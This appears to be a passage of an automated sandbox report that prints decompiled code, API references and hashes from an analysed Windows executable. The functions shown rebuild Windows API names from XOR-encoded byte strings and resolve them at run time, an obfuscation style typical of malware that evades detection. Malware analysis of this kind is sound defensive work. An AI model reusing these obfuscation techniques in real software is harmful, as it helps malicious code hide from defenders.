                                                                    				intOrPtr _t44;
                                                                    				void* _t51;
                                                                    				void* _t52;
                                                                    
                                                                    				_t52 =  &_v24;
                                                                    				_v15 = 0xa5;
                                                                    				_v6 = 0xa5;
                                                                    				_v5 = 0xa5;
                                                                    				_t51 = __ecx;
                                                                    				_v24 = 0x43;
                                                                    				_v23 = 0x42;
                                                                    				_v22 = 0x54;
                                                                    				_v21 = 0x50;
                                                                    				_v20 = 0x72;
                                                                    				_v19 = 0x6f;
                                                                    				_v18 = 0x63;
                                                                    				_v17 = 0;
                                                                    				_v16 = 0xab;
                                                                    				_v14 = 0xa8;
                                                                    				_v13 = 0xaa;
                                                                    				_v12 = 0xbc;
                                                                    				_v11 = 0xba;
                                                                    				_v10 = 0xbb;
                                                                    				_v9 = 0xbf;
                                                                    				_v8 = 0xe7;
                                                                    				_v7 = 0xad;
                                                                    				_v4 = 0xc9;
                                                                    				_t37 = 0;
                                                                    				do {
                                                                    					 *(_t52 + _t37 + 0x10) =  *(_t52 + _t37 + 0x10) ^ 0x000000c9;
                                                                    					_t37 = _t37 + 1;
                                                                    				} while (_t37 < 0xd);
                                                                    				_t26 = _t51 + 0x17c; // 0x0
                                                                    				_t50 = 1;
                                                                    				if( *_t26 == 0) {
                                                                    					_t27 = _t51 + 0x1c; // 0x0
                                                                    					if( *_t27 == 0 ||  *((intOrPtr*)(__ecx + 4)) <= 5) {
                                                                    						_t41 = LoadLibraryA( &_v16); // executed
                                                                    						 *(_t51 + 0x170) = _t41;
                                                                    						if(_t41 == 0) {
                                                                    							goto L8;
                                                                    						} else {
                                                                    							_t31 =  &_v24; // 0x43
                                                                    							_t43 = GetProcAddress(_t41, _t31);
                                                                    							 *(_t51 + 0x174) = _t43;
                                                                    							if(_t43 != 0) {
                                                                    								_t33 = _t51 + 0x170; // 0x0
                                                                    								_t44 = E0041E780(5, _t43,  *_t33, 0);
                                                                    								 *((intOrPtr*)(_t51 + 0x178)) = _t44;
                                                                    								if(_t44 == 0) {
                                                                    									_t50 = 0;
                                                                    								}
                                                                    								 *((intOrPtr*)(_t51 + 0x17c)) = _t50;
                                                                    								return _t50;
                                                                    							} else {
                                                                    								goto L8;
                                                                    							}
                                                                    						}
                                                                    					} else {
                                                                    						L8:
                                                                    						return 0;
                                                                    					}
                                                                    				} else {
                                                                    					return 1;
                                                                    				}
                                                                    			}






























                                                                    0x0041f2b0
                                                                    0x0041f2b6
                                                                    0x0041f2ba
                                                                    0x0041f2be
                                                                    0x0041f2c3
                                                                    0x0041f2c5
                                                                    0x0041f2ca
                                                                    0x0041f2cf
                                                                    0x0041f2d4
                                                                    0x0041f2d9
                                                                    0x0041f2de
                                                                    0x0041f2e3
                                                                    0x0041f2e8
                                                                    0x0041f2ed
                                                                    0x0041f2f2
                                                                    0x0041f2f7
                                                                    0x0041f2fc
                                                                    0x0041f301
                                                                    0x0041f306
                                                                    0x0041f30b
                                                                    0x0041f310
                                                                    0x0041f315
                                                                    0x0041f31a
                                                                    0x0041f31f
                                                                    0x0041f321
                                                                    0x0041f321
                                                                    0x0041f326
                                                                    0x0041f327
                                                                    0x0041f32c
                                                                    0x0041f334
                                                                    0x0041f339
                                                                    0x0041f343
                                                                    0x0041f348
                                                                    0x0041f355
                                                                    0x0041f35d
                                                                    0x0041f363
                                                                    0x00000000
                                                                    0x0041f365
                                                                    0x0041f365
                                                                    0x0041f36b
                                                                    0x0041f373
                                                                    0x0041f379
                                                                    0x0041f383
                                                                    0x0041f38f
                                                                    0x0041f396
                                                                    0x0041f39c
                                                                    0x0041f39e
                                                                    0x0041f39e
                                                                    0x0041f3a0
                                                                    0x0041f3ad
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041f379
                                                                    0x0041f37c
                                                                    0x0041f37c
                                                                    0x0041f382
                                                                    0x0041f382
                                                                    0x0041f33b
                                                                    0x0041f342
                                                                    0x0041f342

                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(000000C9), ref: 0041F355
                                                                    • GetProcAddress.KERNEL32(00000000,Ch{D), ref: 0041F36B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Ch{D$c$o$r
                                                                    • API String ID: 2574300362-1364534458
                                                                    • Opcode ID: 514d3dc774f37e81766c8d3ab85fe732d3e6d5683ae72d2203f5afa81dfde80f
                                                                    • Instruction ID: 6d2cee5cf06e2373cc58e546c6cd093d6d98c9fbf8c50c938b505b46c62d6698
                                                                    • Opcode Fuzzy Hash: 514d3dc774f37e81766c8d3ab85fe732d3e6d5683ae72d2203f5afa81dfde80f
                                                                    • Instruction Fuzzy Hash: 4D31462120C78299D321DA3D980478BBFE45BD6214F884A9DE5F8C63E2D264C54A87A7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00423F8A() {
                                                                    				_Unknown_base(*)()* _t1;
                                                                    
                                                                    				_t1 = SetUnhandledExceptionFilter(E00423F3C); // executed
                                                                    				 *0x448100 = _t1;
                                                                    				return 0;
                                                                    			}




                                                                    0x00423f8f
                                                                    0x00423f95
                                                                    0x00423f9c

                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00023F3C), ref: 00423F8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 7082f2a207c73e6f2ff5ae4176c4d086c9b68abffc6c8fa12be2fc8cc1d7e6e9
                                                                    • Instruction ID: f18a9063bad6c65031e90eeaf258b616ef1963d36d663888d1a639fbb8ea6cd4
                                                                    • Opcode Fuzzy Hash: 7082f2a207c73e6f2ff5ae4176c4d086c9b68abffc6c8fa12be2fc8cc1d7e6e9
                                                                    • Instruction Fuzzy Hash: 60A022B8B203A08BC300EF30BE083083AB0B302303F02823BE000C2220FF3880008A0C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNELBASE ref: 00423FA3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: dcb5d873fc063d344fa3ce455e81404149490a0e9f5844abcee534195117e689
                                                                    • Instruction ID: 57a06b86e4b34049dc710b5a6528cb5604d8b23350c081a879b4c41cd29ee59f
                                                                    • Opcode Fuzzy Hash: dcb5d873fc063d344fa3ce455e81404149490a0e9f5844abcee534195117e689
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 100%
                                                                    			E0041BA80(CHAR* _a4, CHAR* _a8, long _a12) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				char _v24;
                                                                    				char _v25;
                                                                    				char _v26;
                                                                    				char _v27;
                                                                    				long _t32;
                                                                    				void* _t34;
                                                                    				char* _t43;
                                                                    
                                                                    				if( *0x447e90 == 0) {
                                                                    					 *_t43 = 0x49;
                                                                    					_v22 = 0x49;
                                                                    					_v24 = 0x62;
                                                                    					_v21 = 0x62;
                                                                    					_v16 = 0x62;
                                                                    					_v13 = 0x62;
                                                                    					_v7 = 0x62;
                                                                    					_v27 = 0x74;
                                                                    					_v26 = 0x7c;
                                                                    					_v25 = 0x6d;
                                                                    					_v23 = 0x68;
                                                                    					_v20 = 0x7a;
                                                                    					_v19 = 0x65;
                                                                    					_v18 = 0x7e;
                                                                    					_v17 = 0x63;
                                                                    					_v15 = 0x61;
                                                                    					_v14 = 0x69;
                                                                    					_v12 = 0x78;
                                                                    					_v11 = 0x5f;
                                                                    					_v10 = 0x78;
                                                                    					_v9 = 0x7e;
                                                                    					_v8 = 0x65;
                                                                    					_v6 = 0x6b;
                                                                    					_v5 = 0x7f;
                                                                    					_v4 = 0x4d;
                                                                    					_v3 = 0xc;
                                                                    					_t34 = 0;
                                                                    					do {
                                                                    						 *(_t43 + _t34) =  *(_t43 + _t34) ^ 0x0000000c;
                                                                    						_t34 = _t34 + 1;
                                                                    					} while (_t34 < 0x1a);
                                                                    					 *0x447e90 = E0041A600(_t43);
                                                                    				}
                                                                    				_t32 = ExpandEnvironmentStringsA(_a4, _a8, _a12); // executed
                                                                    				return _t32;
                                                                    			}































                                                                    0x0041ba8a
                                                                    0x0041ba94
                                                                    0x0041ba97
                                                                    0x0041ba9f
                                                                    0x0041baa3
                                                                    0x0041baa7
                                                                    0x0041baab
                                                                    0x0041baaf
                                                                    0x0041bab3
                                                                    0x0041bab8
                                                                    0x0041babd
                                                                    0x0041bac2
                                                                    0x0041bac7
                                                                    0x0041bacc
                                                                    0x0041bad1
                                                                    0x0041bad5
                                                                    0x0041bada
                                                                    0x0041badf
                                                                    0x0041bae4
                                                                    0x0041bae8
                                                                    0x0041baed
                                                                    0x0041baf1
                                                                    0x0041baf5
                                                                    0x0041bafa
                                                                    0x0041baff
                                                                    0x0041bb04
                                                                    0x0041bb09
                                                                    0x0041bb0e
                                                                    0x0041bb10
                                                                    0x0041bb10
                                                                    0x0041bb14
                                                                    0x0041bb15
                                                                    0x0041bb26
                                                                    0x0041bb26
                                                                    0x0041bb3a
                                                                    0x0041bb3f

                                                                    APIs
                                                                    • ExpandEnvironmentStringsA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0041BB3A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentExpandStrings
                                                                    • String ID: M$PGqt$_$a$c$e$e$h$i$k$m$t$z$|
                                                                    • API String ID: 237503144-122952740
                                                                    • Opcode ID: a135374a40a52d6a1d7626a5868f7d812607d6f4853a82bcfa3de4a859028d72
                                                                    • Instruction ID: f24a415604d17614737f143f2ea65e50c41753ea06f2e0d05fcb7f4724276cf1
                                                                    • Opcode Fuzzy Hash: a135374a40a52d6a1d7626a5868f7d812607d6f4853a82bcfa3de4a859028d72
                                                                    • Instruction Fuzzy Hash: FF21B05110D3C19DE302DB68944478BBFD21BB6648F48CD9DE0D84B293C2BA965CC773
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 7 41bbd0-41bbda 8 41bc4b-41bc64 GetTempFileNameA 7->8 9 41bbdc-41bc2e 7->9 10 41bc30-41bc38 9->10 10->10 11 41bc3a-41bc46 call 41a600 10->11 11->8
                                                                    C-Code - Quality: 100%
                                                                    			E0041BBD0(CHAR* _a4, CHAR* _a8, int _a12, CHAR* _a16) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				int _t24;
                                                                    				void* _t26;
                                                                    				char* _t34;
                                                                    
                                                                    				if( *0x447e98 == 0) {
                                                                    					_v19 = 0x56;
                                                                    					_v16 = 0x56;
                                                                    					_v10 = 0x56;
                                                                    					_v6 = 0x56;
                                                                    					 *_t34 = 0x74;
                                                                    					_v18 = 0x47;
                                                                    					_v17 = 0x67;
                                                                    					_v15 = 0x5e;
                                                                    					_v14 = 0x43;
                                                                    					_v13 = 0x75;
                                                                    					_v12 = 0x5a;
                                                                    					_v11 = 0x5f;
                                                                    					_v9 = 0x7d;
                                                                    					_v8 = 0x52;
                                                                    					_v7 = 0x5e;
                                                                    					_v5 = 0x72;
                                                                    					_v4 = 0x33;
                                                                    					_t26 = 0;
                                                                    					do {
                                                                    						 *(_t34 + _t26) =  *(_t34 + _t26) ^ 0x00000033;
                                                                    						_t26 = _t26 + 1;
                                                                    					} while (_t26 < 0x11);
                                                                    					 *0x447e98 = E0041A600(_t34);
                                                                    				}
                                                                    				_t24 = GetTempFileNameA(_a4, _a8, _a12, _a16); // executed
                                                                    				return _t24;
                                                                    			}






















                                                                    0x0041bbda
                                                                    0x0041bbe0
                                                                    0x0041bbe4
                                                                    0x0041bbe8
                                                                    0x0041bbec
                                                                    0x0041bbf0
                                                                    0x0041bbf4
                                                                    0x0041bbf9
                                                                    0x0041bbfe
                                                                    0x0041bc02
                                                                    0x0041bc07
                                                                    0x0041bc0c
                                                                    0x0041bc11
                                                                    0x0041bc16
                                                                    0x0041bc1b
                                                                    0x0041bc20
                                                                    0x0041bc24
                                                                    0x0041bc29
                                                                    0x0041bc2e
                                                                    0x0041bc30
                                                                    0x0041bc30
                                                                    0x0041bc34
                                                                    0x0041bc35
                                                                    0x0041bc46
                                                                    0x0041bc46
                                                                    0x0041bc5f
                                                                    0x0041bc64

                                                                    APIs
                                                                    • GetTempFileNameA.KERNELBASE(?,?,?,?,00000104,?,00000012,?,00000001), ref: 0041BC5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: FileNameTemp
                                                                    • String ID: 3$C$G$R$Z$_$g$r$u$}
                                                                    • API String ID: 745986568-3742349677
                                                                    • Opcode ID: 1f707675465ab44d43585bca2e86f6154bab03a41cfa8a3412d594cfa164e95b
                                                                    • Instruction ID: 0aa05d3606b24facbe349c6b14a0a2affd38bbc94f36f494d3d9caf5282f1197
                                                                    • Opcode Fuzzy Hash: 1f707675465ab44d43585bca2e86f6154bab03a41cfa8a3412d594cfa164e95b
                                                                    • Instruction Fuzzy Hash: 2B11F86140C3C0AED302D768D444A5BBFD56BA6208F08CD9DE0DC87253D2B9D649C767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 14 41cd20-41cd2a 15 41cdab-41cdc9 GetTokenInformation 14->15 16 41cd2c-41cd8f 14->16 17 41cd90-41cd98 16->17 17->17 18 41cd9a-41cda6 call 41c580 17->18 18->15
                                                                    C-Code - Quality: 100%
                                                                    			E0041CD20(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                                                                    				char _v1;
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				int _t28;
                                                                    				void* _t31;
                                                                    				CHAR* _t41;
                                                                    
                                                                    				if( *0x447f30 == 0) {
                                                                    					_v19 = 0x68;
                                                                    					_v14 = 0x68;
                                                                    					_v13 = 0x63;
                                                                    					_v11 = 0x63;
                                                                    					_v2 = 0x63;
                                                                    					 *_t41 = 0x4a;
                                                                    					_v18 = 0x79;
                                                                    					_v17 = 0x59;
                                                                    					_v16 = 0x62;
                                                                    					_v15 = 0x66;
                                                                    					_v12 = 0x44;
                                                                    					_v10 = 0x6b;
                                                                    					_v9 = 0x62;
                                                                    					_v8 = 0x7f;
                                                                    					_v7 = 0x60;
                                                                    					_v6 = 0x6c;
                                                                    					_v5 = 0x79;
                                                                    					_v4 = 0x64;
                                                                    					_v3 = 0x62;
                                                                    					_v1 = 0xd;
                                                                    					_t31 = 0;
                                                                    					do {
                                                                    						 *(_t41 + _t31) =  *(_t41 + _t31) ^ 0x0000000d;
                                                                    						_t31 = _t31 + 1;
                                                                    					} while (_t31 < 0x14);
                                                                    					 *0x447f30 = E0041C580(_t41);
                                                                    				}
                                                                    				_t28 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                                                                    				return _t28;
                                                                    			}

























                                                                    0x0041cd2a
                                                                    0x0041cd2e
                                                                    0x0041cd32
                                                                    0x0041cd3c
                                                                    0x0041cd40
                                                                    0x0041cd44
                                                                    0x0041cd48
                                                                    0x0041cd4c
                                                                    0x0041cd50
                                                                    0x0041cd55
                                                                    0x0041cd59
                                                                    0x0041cd5e
                                                                    0x0041cd63
                                                                    0x0041cd68
                                                                    0x0041cd6c
                                                                    0x0041cd71
                                                                    0x0041cd76
                                                                    0x0041cd7b
                                                                    0x0041cd7f
                                                                    0x0041cd84
                                                                    0x0041cd88
                                                                    0x0041cd8d
                                                                    0x0041cd90
                                                                    0x0041cd90
                                                                    0x0041cd94
                                                                    0x0041cd95
                                                                    0x0041cda6
                                                                    0x0041cda6
                                                                    0x0041cdc4
                                                                    0x0041cdc9

                                                                    APIs
                                                                    • GetTokenInformation.KERNELBASE(?,?,?,?,?), ref: 0041CDC4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: InformationToken
                                                                    • String ID: D$Y$`$d$f$k$l
                                                                    • API String ID: 4114910276-652578173
                                                                    • Opcode ID: 5dcd6caafda48195a7143808963921941d45b2b963cf4a5d3eaf3e582be202be
                                                                    • Instruction ID: 7def42bec187e1484ff266950f5acf8630221303d3b86c56375e3e0998d74be4
                                                                    • Opcode Fuzzy Hash: 5dcd6caafda48195a7143808963921941d45b2b963cf4a5d3eaf3e582be202be
                                                                    • Instruction Fuzzy Hash: AF11F46100C3C0AED302DB69988469BBFE25BA6608F08CD9DE0C887243D27AD648C777
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 21 41b2d0-41b2da 22 41b333-41b35b CreateFileA 21->22 23 41b2dc-41b316 21->23 24 41b318-41b320 23->24 24->24 25 41b322-41b32e call 41a600 24->25 25->22
                                                                    C-Code - Quality: 100%
                                                                    			E0041B2D0(CHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, void* _a28) {
                                                                    				char _v1;
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				void* _t22;
                                                                    				void* _t24;
                                                                    				char* _t34;
                                                                    
                                                                    				if( *0x447e4c == 0) {
                                                                    					_v10 = 0x61;
                                                                    					_v7 = 0x61;
                                                                    					_v3 = 0x61;
                                                                    					 *_t34 = 0x47;
                                                                    					_v11 = 0x76;
                                                                    					_v9 = 0x65;
                                                                    					_v8 = 0x70;
                                                                    					_v6 = 0x42;
                                                                    					_v5 = 0x6d;
                                                                    					_v4 = 0x68;
                                                                    					_v2 = 0x45;
                                                                    					_v1 = 4;
                                                                    					_t24 = 0;
                                                                    					do {
                                                                    						 *(_t34 + _t24) =  *(_t34 + _t24) ^ 0x00000004;
                                                                    						_t24 = _t24 + 1;
                                                                    					} while (_t24 < 0xc);
                                                                    					 *0x447e4c = E0041A600(_t34);
                                                                    				}
                                                                    				_t22 = CreateFileA(_a4, _a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                    				return _t22;
                                                                    			}

















                                                                    0x0041b2da
                                                                    0x0041b2de
                                                                    0x0041b2e2
                                                                    0x0041b2e6
                                                                    0x0041b2ea
                                                                    0x0041b2ee
                                                                    0x0041b2f3
                                                                    0x0041b2f8
                                                                    0x0041b2fd
                                                                    0x0041b302
                                                                    0x0041b307
                                                                    0x0041b30c
                                                                    0x0041b311
                                                                    0x0041b316
                                                                    0x0041b318
                                                                    0x0041b318
                                                                    0x0041b31c
                                                                    0x0041b31d
                                                                    0x0041b32e
                                                                    0x0041b32e
                                                                    0x0041b356
                                                                    0x0041b35b

                                                                    APIs
                                                                    • CreateFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B356
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: B$E$e$h$m$p$v
                                                                    • API String ID: 823142352-890941293
                                                                    • Opcode ID: 1cb5274a05bb758bdb30b7e49f64677e4cbe72a1414d72b7daf56c78a1aae5bd
                                                                    • Instruction ID: 5ffc414e4524d8812c80a38cc8b34097e4f1f70708f5ae5c9670413b653ca607
                                                                    • Opcode Fuzzy Hash: 1cb5274a05bb758bdb30b7e49f64677e4cbe72a1414d72b7daf56c78a1aae5bd
                                                                    • Instruction Fuzzy Hash: C41118A110C380AAD301DB69D944B0BBBE55BEA708F04CA9DF5CC87252D679E918C76B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 93%
                                                                    			_entry_(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                    				signed int _t35;
                                                                    				struct HINSTANCE__* _t38;
                                                                    				void* _t40;
                                                                    				intOrPtr _t47;
                                                                    				signed int _t50;
                                                                    				intOrPtr _t52;
                                                                    				signed int _t63;
                                                                    				signed int _t64;
                                                                    				long _t68;
                                                                    				intOrPtr* _t78;
                                                                    				long _t79;
                                                                    				struct _OSVERSIONINFOA* _t85;
                                                                    				signed int _t87;
                                                                    				void* _t90;
                                                                    				struct _OSVERSIONINFOA* _t91;
                                                                    
                                                                    				_push(0x60);
                                                                    				E0042422C(__ebx, __edi, __esi);
